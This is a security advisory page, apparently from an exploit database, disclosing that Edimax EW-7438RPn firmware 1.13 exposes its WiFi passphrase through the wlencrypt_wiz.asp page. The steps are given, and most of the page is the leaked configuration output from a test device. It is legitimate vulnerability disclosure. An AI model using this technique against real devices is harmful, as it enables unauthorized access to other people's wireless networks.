Edimax EW-7438RPn Information Disclosure

2020.04.22
Credit: Besim Altinok
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) # Date: 2020-04-21 # Exploit Author: Besim ALTINOK # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Version:1.13 # Tested on: Edimax EW-7438RPn 1.13 Version ----------------------------- Here step by step : 1. I did Setup 2. After setup try to access to *wlencrypt_wiz.asp* file 3. After access to this file, I saw some information disclosure (Like *WiFi Password*) 4. Here is the all leak here: ------------------------------- <SCRIPT> var _DATE_="Mon Sep 24 19:38:17 CST 2012"; var _VERSION_="1.13"; var _MODEL_="EW7438RPN"; var _MODE_="Edimax"; var _PLATFORM_="RTL8196CS_1200"; var _HW_LED_WPS_="4"; var _HW_LED_POWER_="6"; var _HW_LED_WIRELESS_="2"; var _HW_BUTTON_RESET_="5"; var _HW_BUTTON_WPS_="1"; var _HW_BUTTON_SWITCH_="3"; var _HW_LED_USB_="17"; var _WIRELESS_IGMPSNOOP_="y"; var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y"; var _RDISC_="y"; var _WPS_NO_BROADCAST_="y"; var _UPNP_LIB_VERSION2_="y"; var _WDS_UR_INFO_="y"; var _RESERVE_ENCRYPTION_SETTING_="y"; var _IGMP_PROXY_="y"; var _IGMPSNOOP_="y"; var _RFTYPE_="2T2R"; var _MEMBUS_="16"; var _MEMSIZE_="16"; var _MEMTYPE_="SDRAM"; var _FLASHTYPE_="SPI"; var _REMOVE_RADIUS_SERVER_="y"; var _AUTO_CHANNEL_DET_="y"; var _CONTROL_SIDEBAND_="y"; var _WIFI_11N_STANDARD_="y"; var _SETTING_WIZARD_="y"; var _CONFIG_FILE_NAME_="7438RPN"; var _AP_WITH_DNS_="y"; var _USE_DNRD_="y"; var _WPS_MIX_="y"; var _POWER_SAVING_="y"; var _WEB_FILE_NAME_="7438RPN"; var _PINCODE_BY_MAC_="y"; var _UPNP_RESPONDER_="y"; var _MDNS_RESPONDER_="y"; var _NETBIOS_RESPONDER_="y"; var _AP_WITH_DHCP_CLIENT_="y"; var _LLTD_NODENAME_="y"; var _DHCP_SWITCH_="y"; var _CONNECT_TEST_="y"; var _START_BOA_="y"; var _WPS_Daemon_="y"; var security = 1; apMode = 6; methodVal = 2; opMode = 0; apMachType = 1; var ssidTbl = new Array("PentesterTraining"); var mirrorTbl = ""; var secModeTbl = new Array("2"); var enable1XTbl = new Array("0"); var _1xMode = "0"; var wepTbl = new Array("0"); var keyTypeTbl = new Array("1"); var wpaCipherTbl = new Array("2"); var pskFormatTbl = new Array("0"); var pskValueTbl = new Array("wifipass123."); var defaultKeyIdTbl=new Array("0"); var rsIp= ""; var rsPort= "1812"; var rsPassword= ""; -- Besim ALTINOK *Security Engineer*


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top